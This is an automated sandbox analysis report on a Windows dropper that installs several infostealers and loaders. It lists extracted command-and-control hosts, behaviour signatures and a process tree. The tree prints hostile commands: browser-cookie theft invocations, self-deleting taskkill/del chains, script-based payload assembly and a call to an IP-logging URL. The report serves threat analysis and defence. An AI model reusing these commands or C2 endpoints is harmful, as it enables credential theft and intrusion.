Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1803s
  • max time network
    1819s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    20-07-2021 16:13

General

  • Target

    8 (24).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

redline

Botnet

2007

C2

37.1.219.52:6534

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

redline

Botnet

sel17

C2

dwarimlari.xyz:80

Extracted

Family

vidar

Version

39.6

Botnet

903

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    903

Extracted

Family

fickerstealer

C2

37.0.8.225:80

Extracted

Family

vidar

Version

39.7

Botnet

865

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 10 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 8 IoCs

    RedlineStealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 20 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2852
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2836
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2756
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2608
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2576
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1908
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1428
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1376
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1180
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1096
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:68
                      • C:\Users\Admin\AppData\Roaming\rseusrd
                        C:\Users\Admin\AppData\Roaming\rseusrd
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5540
                      • C:\Users\Admin\AppData\Roaming\rseusrd
                        C:\Users\Admin\AppData\Roaming\rseusrd
                        2⤵
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5784
                      • C:\Users\Admin\AppData\Roaming\rseusrd
                        C:\Users\Admin\AppData\Roaming\rseusrd
                        2⤵
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5448
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:340
                      • C:\Users\Admin\AppData\Local\Temp\8 (24).exe
                        "C:\Users\Admin\AppData\Local\Temp\8 (24).exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:644
                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:2548
                          • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\setup_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\setup_install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:4044
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_1.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1496
                              • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_1.exe
                                sonia_1.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:4032
                                • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_1.exe
                                  "C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_1.exe" -a
                                  6⤵
                                  • Executes dropped EXE
                                  PID:3548
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_2.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3424
                              • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_2.exe
                                sonia_2.exe
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: MapViewOfSection
                                PID:2280
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_3.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1352
                              • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_3.exe
                                sonia_3.exe
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks processor information in registry
                                • Modifies system certificate store
                                PID:2244
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_3.exe" & del C:\ProgramData\*.dll & exit
                                  6⤵
                                    PID:5080
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /im sonia_3.exe /f
                                      7⤵
                                      • Kills process with taskkill
                                      PID:492
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 6
                                      7⤵
                                      • Delays execution with timeout.exe
                                      PID:5772
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_4.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1564
                                • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_4.exe
                                  sonia_4.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:1784
                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:1868
                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:664
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:5076
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:4476
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                          PID:5276
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                            PID:6036
                                        • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                          "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:412
                                          • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                            C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4516
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 24
                                              9⤵
                                              • Program crash
                                              PID:2204
                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4288
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 804
                                            8⤵
                                            • Program crash
                                            PID:788
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 840
                                            8⤵
                                            • Program crash
                                            PID:4264
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 884
                                            8⤵
                                            • Program crash
                                            PID:4996
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 956
                                            8⤵
                                            • Program crash
                                            PID:4208
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 960
                                            8⤵
                                            • Program crash
                                            PID:2448
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1000
                                            8⤵
                                            • Program crash
                                            PID:5020
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1052
                                            8⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            PID:720
                                        • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                          "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4492
                                          • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                            "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                            8⤵
                                              PID:4380
                                          • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                            "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Drops file in Windows directory
                                            PID:4188
                                          • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4748
                                            • C:\Windows\system32\WerFault.exe
                                              C:\Windows\system32\WerFault.exe -u -p 4748 -s 1012
                                              8⤵
                                              • Program crash
                                              PID:5640
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c sonia_6.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:1568
                                      • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_6.exe
                                        sonia_6.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Suspicious use of WriteProcessMemory
                                        PID:900
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          6⤵
                                          • Executes dropped EXE
                                          PID:1448
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:604
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          6⤵
                                            PID:212
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                              PID:5868
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_7.exe
                                          4⤵
                                            PID:3132
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c sonia_5.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:2100
                                    • \??\c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                      1⤵
                                      • Suspicious use of SetThreadContext
                                      • Modifies registry class
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:1040
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                        2⤵
                                        • Drops file in System32 directory
                                        • Checks processor information in registry
                                        • Modifies data under HKEY_USERS
                                        • Modifies registry class
                                        PID:3328
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4F9A8594\sonia_5.exe
                                      sonia_5.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:2188
                                      • C:\Users\Admin\Documents\xNT9fhUCsxcfL514Nnw7z4bZ.exe
                                        "C:\Users\Admin\Documents\xNT9fhUCsxcfL514Nnw7z4bZ.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4652
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c cmd < Bagnava.xltm
                                          3⤵
                                            PID:3740
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd
                                              4⤵
                                                PID:4536
                                                • C:\Windows\SysWOW64\findstr.exe
                                                  findstr /V /R "^IPAFDLOJiKVQTxFiLgMiLlaMrCAuVnAKdUxdXbtsjyJWSQEpztbDlGmbvNCwlINIlkmYZfphlcUGAvUjYsMQqXmJxXUpUru$" Sia.xltm
                                                  5⤵
                                                    PID:5128
                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com
                                                    Sensitive.exe.com p
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:1004
                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com
                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com p
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Drops startup file
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious behavior: MapViewOfSection
                                                      PID:5096
                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:2008
                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:4348
                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5048
                                                  • C:\Windows\SysWOW64\PING.EXE
                                                    ping 127.0.0.1 -n 30
                                                    5⤵
                                                    • Runs ping.exe
                                                    PID:6112
                                            • C:\Users\Admin\Documents\ojXQ7milnyvh1Yttq2HZkbGN.exe
                                              "C:\Users\Admin\Documents\ojXQ7milnyvh1Yttq2HZkbGN.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:4720
                                            • C:\Users\Admin\Documents\7L20KU5r8vvgaquh8AqsqF7Y.exe
                                              "C:\Users\Admin\Documents\7L20KU5r8vvgaquh8AqsqF7Y.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4700
                                              • C:\Users\Admin\Documents\7L20KU5r8vvgaquh8AqsqF7Y.exe
                                                C:\Users\Admin\Documents\7L20KU5r8vvgaquh8AqsqF7Y.exe
                                                3⤵
                                                • Executes dropped EXE
                                                PID:908
                                            • C:\Users\Admin\Documents\t69lW1xxKcwBjyI0FqXLeqXV.exe
                                              "C:\Users\Admin\Documents\t69lW1xxKcwBjyI0FqXLeqXV.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:4812
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                3⤵
                                                  PID:3956
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd
                                                    4⤵
                                                      PID:3756
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                        5⤵
                                                          PID:6040
                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                          Acre.exe.com k
                                                          5⤵
                                                            PID:5796
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Drops startup file
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:4800
                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
                                                                7⤵
                                                                  PID:4320
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping 127.0.0.1 -n 30
                                                              5⤵
                                                              • Runs ping.exe
                                                              PID:5040
                                                      • C:\Users\Admin\Documents\cDprxxqpvlUNnmrH4bw43UBi.exe
                                                        "C:\Users\Admin\Documents\cDprxxqpvlUNnmrH4bw43UBi.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4784
                                                        • C:\Users\Admin\Documents\cDprxxqpvlUNnmrH4bw43UBi.exe
                                                          C:\Users\Admin\Documents\cDprxxqpvlUNnmrH4bw43UBi.exe
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Checks processor information in registry
                                                          PID:1404
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im cDprxxqpvlUNnmrH4bw43UBi.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\cDprxxqpvlUNnmrH4bw43UBi.exe" & del C:\ProgramData\*.dll & exit
                                                            4⤵
                                                              PID:5684
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /im cDprxxqpvlUNnmrH4bw43UBi.exe /f
                                                                5⤵
                                                                • Kills process with taskkill
                                                                PID:5916
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout /t 6
                                                                5⤵
                                                                • Delays execution with timeout.exe
                                                                PID:5740
                                                        • C:\Users\Admin\Documents\jutOQm8OwqyocCpZEPUL2RVd.exe
                                                          "C:\Users\Admin\Documents\jutOQm8OwqyocCpZEPUL2RVd.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Checks BIOS information in registry
                                                          • Checks whether UAC is enabled
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:4976
                                                          • C:\Users\Admin\AppData\Roaming\1234.exe
                                                            C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:5960
                                                            • C:\Users\Admin\AppData\Roaming\1234.exe
                                                              "{path}"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:508
                                                        • C:\Users\Admin\Documents\LU1V4cqk6Oxtomgy_veIUqqd.exe
                                                          "C:\Users\Admin\Documents\LU1V4cqk6Oxtomgy_veIUqqd.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:4956
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:5680
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:5596
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:5444
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:5500
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            3⤵
                                                              PID:4152
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              3⤵
                                                                PID:4728
                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                3⤵
                                                                  PID:5692
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  3⤵
                                                                    PID:5904
                                                                • C:\Users\Admin\Documents\qveh3VFd0G0ccCAD7pweYHOg.exe
                                                                  "C:\Users\Admin\Documents\qveh3VFd0G0ccCAD7pweYHOg.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4948
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                    3⤵
                                                                      PID:5288
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /f /im chrome.exe
                                                                        4⤵
                                                                        • Kills process with taskkill
                                                                        PID:5496
                                                                  • C:\Users\Admin\Documents\mXpPzzdxpsCbRR6aZlZC5yyV.exe
                                                                    "C:\Users\Admin\Documents\mXpPzzdxpsCbRR6aZlZC5yyV.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    PID:4940
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                                                                      3⤵
                                                                        PID:4448
                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                          explorer https://iplogger.org/2LBCU6
                                                                          4⤵
                                                                            PID:5000
